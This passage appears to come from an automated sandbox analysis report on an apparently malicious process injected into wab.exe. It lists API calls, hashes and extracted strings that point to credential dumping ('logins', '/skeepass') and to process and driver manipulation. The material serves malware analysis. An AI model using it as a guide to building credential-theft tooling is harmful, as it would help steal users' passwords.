                                                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                    • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                                                    • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 4233704886-1717621600
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
